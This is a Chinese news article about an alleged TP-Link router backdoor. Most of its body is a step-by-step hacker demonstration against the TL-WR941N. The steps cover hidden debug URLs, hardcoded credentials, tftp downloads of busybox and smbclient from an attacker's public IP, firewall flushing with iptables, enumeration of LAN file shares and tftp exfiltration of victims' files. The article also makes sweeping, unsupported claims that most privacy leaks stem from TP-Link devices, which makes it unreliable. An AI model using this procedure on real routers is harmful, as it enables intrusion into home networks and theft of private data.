TP-LINK成隱私洩露最大渠道 70%用戶或受害

2020-12-13 中國日報網

TP-LINK成隱私洩露最大渠道 70%用戶或受害

近期,「TP-LINK漏洞門」事件被CNVD( 國家信息安全漏洞共享平臺)曝光後,在社會上引起了極大的關注。由於TP-LINK的市場佔有率達到70%,很多網友擔心自己的信息是否被洩露。

據一位資深黑客介紹,TP-LINK路由器的後門漏洞危險程度遠遠大於目前披露的程度。他解釋,在攻擊漏洞的TP-LINK路由器時,並非一定要在本地連接路由器,而是可以通過遠程進入TP-LINK路由器,從而監控網友的所有上網行為,並且能夠竊取本地信息。也就是說,控制了用戶的TP-LINK路由器之後,也就可以監控用戶的上網行為,隨意從網友的電腦裡竊取一切信息,不管是隱私信息還是重要資料都可以信手拈來,而用戶根本不知道。

他做了一個演示,利用TP-LINK存在的後門漏洞,輕鬆的監控用戶的上網行為,用戶在QQ裡面聊了什麼,在淘寶上面買了什麼東西,他都能夠一目了然,在他的眼裡看來,用戶就是一個完全透明的人。而且,他還可以利用TP-LINK的漏洞進入用戶的電腦,不管用戶是在歐洲拍的婚紗照,還是在家裡和愛人拍的隱私照,只要他想盜取隨時都可以,完全沒有隱私可言。

他還介紹,TP-LINK的後門漏洞存在多年,一直都沒有被TP-LINK重視,而TP-LINK的市場佔有率達到70%以上。所以,很多隱私洩露都與TP-LINK有關,不然黑客怎麼可能獲得用戶的隱私照片和銀行帳號,很多都是利用TP-LINK的漏洞完成的,只是用戶根本不知道而已。國內用水星和迅捷的用戶也難免厄運,因為水星和迅捷都是TP-LINK的馬甲,只要能夠找到TP-LINK路由器的漏洞,就能隨意進入水星和迅捷路由器用戶的電腦。就目前來說,TP-LINK的路由器大多存在問題,要想保證絕對安全幾乎不大可能。

以下是黑客利用TP-LINK路由器後門漏洞盜取用戶信息的演示:

  一、環境拓撲圖

圖1 環境拓撲圖

拓撲圖說明:

1、PC2 使用公網IP,或者是連接公網的路由器下的DMZ設備 ;

2、TP-Link開啟遠程WEB訪問,示例中的8011為遠程WEB訪問埠 ;

3、PC2要開啟TFTP伺服器 ;

4、TP-Link設備型號:TL-WR941N,實物圖請見附錄 。

二、操作步驟

1、在TP-Link設備聯網情況下開啟遠程WEB訪問,如圖2、圖3

2、PC2設備在聯網情況下,在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/start_art.html(xxx.xxx.xxx.xxx為TP-Link設備的WAN口IP,8011為遠程WEB訪問的埠號),等待1分鐘左右出現如下頁面,如圖4所示

圖4

3、PC2在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/linux_cmdline.html,出現TP-LINK設備的登錄頁面,輸入設備管理的用戶名和密碼(用戶名:admin,密碼:admin),進入以下頁面(如圖5所示),這個頁面需要的用戶名是:osteam,密碼是:5up。在這個頁面我們就可以大展拳腳了。接下來我們就利用漏洞來訪問TP-link區域網下的共享

圖5

4、PC2開啟tftp伺服器,並在tftp伺服器路徑下放置 busybox /libbigballofmud.so / smbclient / smbtree文件(後面會將這幾個文件通過tftp導入到TP-Link設備的/tmp目錄下)。在設備頁面的指令欄輸入 tftp -g -rbusybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa為PC2的公網IP位址)。出現如下頁面(圖6)

7、在指令欄輸入 iptables -P INPUT ACCEPT / iptables -PFORWARD ACCEPT / iptables –F,如圖9。這幾條命令是改變防火牆的過濾規則,操作後,該設備的防火牆就形同虛設了。

10、在telnet窗口輸入cd /tmp,進入該目錄後先後輸入 tftp -g -r libbigballofmud.soaaa.aaa.aaa.aaa/ tftp -g -r smbclient aaa.aaa.aaa.aaa/ tftp -g -rsmbtreeaaa.aaa.aaa.aaa(這幾個命令是將libbigballofmud.so/smbtree/smbclient通過TFTP導入到TP-Link的/tmp目錄下,所以要確保PC2開啟TFTP伺服器)。如圖12所示,已成功導入

圖12

11、在telnet界面輸入以下命令(如圖13所示)

mount tmpfs /usr -t tmpfs

/tmp/busybox mkdir -p /usr/lib

/tmp/busybox cp /tmp/*so* /usr/lib/ -fr

/tmp/busybox ln -s /usr/lib/libbigballofmud.so/usr/lib/libbigballofmud.so.0

chmod 777 smbtree

chmod 777 smbclient

圖13

12、在/tmp目錄下執行./smbtree命令,即可搜索到該區域網下的共享文件信息,圖14

圖14

13、執行./smbclient//bbbb/bbbbbb(//bbbb/bbbbbb為圖14搜索到的一個共享文件目錄),密碼為空,進入文件夾後執行ls,顯示該文件夾下的文件類容,如圖15

圖15

14、通過索引目錄,可以查詢到每一個目錄下的文件信息,如/mnt/files/cherryblossoms1.jpg。如圖16所示。接下來我們就看看cherryblossoms1.jpg是一個什麼圖片。

圖16

15、將共享文件拷貝到TP-Link設備上的/tmp目錄下,執行命令getccc(ccc為要拷貝的共享文件,如圖17中的cherryblossoms1.jpg)

圖17

16、將文件通過tftp拷貝到本地設備上,執行命令 /tmp/busybox tftp -p -lccc aaa.aaa.aaa.aaa。如圖18所示

圖20

注意事項:

1、TP-Link設備需要開啟遠程WEB訪問,示例中的8011為遠程WEB訪問的埠

2、本地設備最好使用公網IP,或者是連接公網的路由器下的DMZ設備

3、本地設備要開啟TFTP伺服器

4、 busybox / libbigballofmud.so / smbclient /smbtree 需要拷貝在TP-Link下的/tmp目錄下

5、示例中的xxx.xxx.xxx.xxx為TP-link設備WAN口IP,aaa.aaa.aaa.aaa為PC2的公網IP,//bbbb/bbbbbb為搜索到的一個共享目錄,ccc為共享目錄下的一個共享文件

6、需要用到的工具有: tftpd32.exe 、 busybox 、libbigballofmud.so 、 smbclient 、 smbtree

附錄: TL-WR941N 實物圖

圖21

...

中國日報網版權說明:凡註明來源為「中國日報網:XXX(署名)」,除與中國日報網籤署內容授權協議的網站外,其他任何網站或單位未經允許禁止轉載、使用,違者必究。如需使用,請與010-84883300聯繫;凡本網註明「來源:XXX(非中國日報網)」的作品,均轉載自其它媒體,目的在於傳播更多信息,其他媒體如需轉載,請與稿件來源方聯繫,如產生任何問題與本網無關。

...

相關焦點

  • TP-Link路由器管理員密碼是什麼
    tp-link路由器管理員密碼是什麼?
  • 陳根:大數據時代下隱私洩露頻繁,拿什麼保護我們的隱私?
    與此同時,隱私問題也逐漸成為焦點。儘管數據洩露在網上已經非常普遍,但每一次數據洩露的事件都依舊駭人聽聞,我們誰也不能確定,自己是不是下一個數據洩露事件的受害對象。研究人員總共找到了845GB和近250萬份記錄,可能涉及了數十萬用戶的數據。值得一提的是,這些信息特別敏感,包括露骨的照片和錄音。研究人員還發現了來自其他平臺的私人聊天截圖和付款收據,這些都是應用內用戶之間發送的。
  • tp link無線路由器DNS設置
    tp link無線路由器的用戶眾多,很多用戶買回來卻不知道該如何手動設置路由器的DNS伺服器地址,其實只需非常簡單三步,下面就跟我一起來做吧。PS:為什麼要手動設置DNS伺服器呢?因為寬帶運營商提供的DNS往往不太穩定,而且存在劫持用戶網絡強行彈出廣告等問題。
  • 手機攝像頭和話筒成隱私洩露「重災區」
    日前,騰訊社會研究中心和DCCI網際網路數據研究中心聯合發布《網絡隱私安全及網絡欺詐行為研究分析報告(2018年上半年)》(以下簡稱《報告》),通過對1144款手機APP獲取用戶隱私權限情況的統計顯示,目前幾乎所有手機APP都在獲取用戶隱私信息,但大多數都能遵循「合法、正當、必要」的原則進行獲取,越界獲取用戶隱私比例持續大幅降低,2018年上半年安卓APP越界獲取比例降低到5.1%。
  • 【保密微課】你的隱私是如何被手機APP洩露的
    今天小編就帶大家起底手機APP是如何洩露用戶隱私的。安裝APP時強制用戶同意權限你在安裝某APP時是否遇到過這樣的情況:「xxx想訪問您的麥克風/訪問你的圖庫」當我們點擊不同意時,將無法使用該APP,最後我們不得不被迫同意,躺在我們圖庫、音頻中的個人信息將陷入「易洩露」困境。
  • 支付寶用戶「信息洩露」
    據《時代報》報導,昨日,一則「支付寶鬧內鬼20G用戶信息被盜賣」的新聞在網上流傳,該消息稱,支付寶前員工李某和兩位同夥,將支付寶用戶將近20G的資料有償出售給電商公司、數據公司。消息發布後引發了輿論狂潮。支付寶官方微博昨日發布聲明回應稱,李某洩露的信息不含密碼、核心身份信息,不涉及用戶隱私及安全。
  • 手機成了隱私洩露重災區,攝像頭和話筒動了哪些權限你知道嗎?
    8月3日,騰訊社會研究中心和DCCI網際網路數據研究中心聯合發布《網絡隱私安全及網絡欺詐行為研究分析報告(2018年上半年)》,通過對1144款手機APP獲取用戶隱私權限情況的統計,評估移動端APP的隱私安全。
  • 到底是誰洩露了我們的隱私?
    此類隱私洩露和人肉事件已發生多起,因為輿論有的丟了工作,有的無法面對親戚朋友,更有甚者精神異常。這給一個家庭帶來的損失是無法估量的,也是無法彌補的,未來還有多少起這樣的事情發生,我們無法去估計。這些隱私到底是怎麼洩露的?
  • 2020年隱私安全&信息洩露大事件回顧
    即便是不願承認,但當我們在享受網際網路帶來的快速,便捷,智能的時候,有意或無意間,已經賣掉了自己隱私。回望2020,我們梳理了世界各地發生的重大信息洩露事件,以史為鑑。川普指責蘋果疑犯手機都不願解鎖1月15日,川普指責蘋果:幫了你那麼多,連個疑犯手機都不願解鎖。
  • 求職信洩露個人信息?大數據資訊時代如何拒絕隱私裸奔?
    圖:熱搜榜截圖微博中出現#1元即可購買一條簡歷#、#簡歷被販賣或成騷擾電話源頭#等熱點話題,引發媒體機構和大量網民就「信息安全」這一話題展開討論,有關1元簡歷、隱私、陷阱、簡訊、求職、洩露、一條龍、產業等成為該話題的網絡熱詞。
  • Facebook隱私洩露 或涉及用戶姓名和個人圖片
    11月6日消息,Facebook在昨天對外稱,在平臺開始限制相關用戶信息後的幾個月,與之合作的 100 多個第三方應用可能已經通過Facebook工程組的編程界面訪問了用戶的個人數據。
  • TP-Link無線路由器怎麼設置?TP-Link無線路由器設置步驟
    而對於那些沒有任何計算機基礎的用戶來說,tplink無線路由器設置可能還有一定難度。tplink無線路由器怎麼設置的基礎配置如下:在第一次配置無線寬帶路由器時,參照說明書找到無線寬帶路由器默認的IP位址是192.168.1.1,默認子網掩碼是255.255.255.0。
  • 數億用戶受害!三大APP洩露客戶信息被官方約談,1元1條太廉價!
    數億用戶受害!三大APP洩露客戶信息被官方約談,1元1條太廉價!你有曾在意過自己的個人信息嗎?或者說你知道自己的個人信息有多重要嗎?也許很多人都會了解一些關於信息洩露的危害,但是這也僅限於對大家看得比較重的東西,例如支付密碼、身份證信息等等。但是筆者想說的是,你的個人信息除了這些大家影響比較重的信息之外,其它的如果被洩露了後果也很嚴重。我想大家也經常遭到陌生電話的騷擾、詐騙等等,這些都是因為我們的個人信息洩露導致的。
  • 手機App獲取用戶隱私權限迎來新規範!如何防止隱私信息洩露?
    在日常生活中,手機已經成為我們的生活必備品了,因為我們能夠通過手機APP進行日常交流、學習、工作等,但不知從何時起,各大平臺的大數據就開始分析我們的日常記錄了,出行路線被導航類APP記錄,月度花費被各類支付APP掌握……而作為手機APP的用戶,往往面對著開發者的霸王條款,開隱私權限可以使用軟體,不開隱私權限無法使用軟體,開與關讓用戶陷入了妥協
  • 用戶質疑隱私被洩露,航旅縱橫回應:可自主關閉
    原標題:用戶質疑隱私被航旅縱橫洩露,回應:可自主關閉9月22日消息,有網友反映,在航旅縱橫上選座之後,陌生人可以看到自己的名字和頭像(並且已經受到騷擾),自己也可以查詢到陌生人的名字和頭像,質疑航旅縱橫洩露客戶的隱私。
  • CellETF:健康寶洩露明星素顏照、Ledger 27萬用戶數據洩露?
    健寶洩露明星素顏照近日,一種新型的「健康寶照片」交易方式出現在明星「代拍」行業裡,70張明星健康寶素顏照片打包僅需2元, 1000多名藝人身份證號碼1元打包......許多明星的核酸檢測的素顏照被廣泛流傳出來。
  • 安卓手機用戶注意了 這幾類APP最容易竊取你的隱私
    【TechWeb】1月25日消息,騰訊社會研究中心和DCCI網際網路數據中心聯合發布的《2018年度網絡隱私及網絡欺詐行為研究分析報告》顯示,2018年網絡安全事故頻發,快遞、酒店、外賣、網絡社交等行業領域頻 頻爆出用戶數據洩露事件,洩露的用戶數據大多高達數億級。
  • 微博數據疑似大規模洩露 5.38億用戶信息在暗網出售
    微博還表示,此次數據洩露應該追溯到2018年底,當時,有用戶通過微博相關接口通過批量手機批量上傳通訊錄,匹配出幾百萬個帳號暱稱,再加上通過其他渠道獲取的信息一起對外出售。因此,此次非法調用微博接口匹配出的信息即為微博帳號暱稱,不涉及其餘隱私數據。
  • 蘋果郵箱疑似洩露,用戶隱私遭曝光,新iPhone信號引起眾議
    文|蝸牛有品今天早上,一則有關蘋果的負面消息瞬間引起大眾高度關注,據路透社爆料:蘋果郵箱疑似被黑客入侵,大量用戶隱私曝光,目前已經約有5億部iPhone遭到攻擊。目前蘋果發言人已經承認有該事件,並宣布會在短時間內更新系統漏洞保護用戶隱私。知名手機取證公司ZecOps發布緊急通告,該漏洞可以被不法粉絲遠程控制,調用竊取知名人士隱私。郵件洩露問題讓iPhone以安全出名的招牌蕩然無存,負責人含糊其辭的回答,讓我們不得不思考用戶的隱私誰負責。
  • 中信銀行洩露客戶隱私,那……智能鎖還有隱私保護可言嗎?
    近日,知名脫口秀演員#池子個人信息被中信銀行洩露#事件上了熱搜,不僅因為涉及到的巨額資金,還因為事件涉及到了用戶隱私,從而引起了眾多網友的關注。撇開事件本身起因結果,從這次事件發生後網友的反應,可以看出很多人對洩露隱私這一行為真的是深惡痛絕。舉個例子:各位平時接到廣告推銷電話時,是不是很痛恨洩露你信息的個人或組織?同時,在智能家居領域,隱私安全問題近來也備受關注。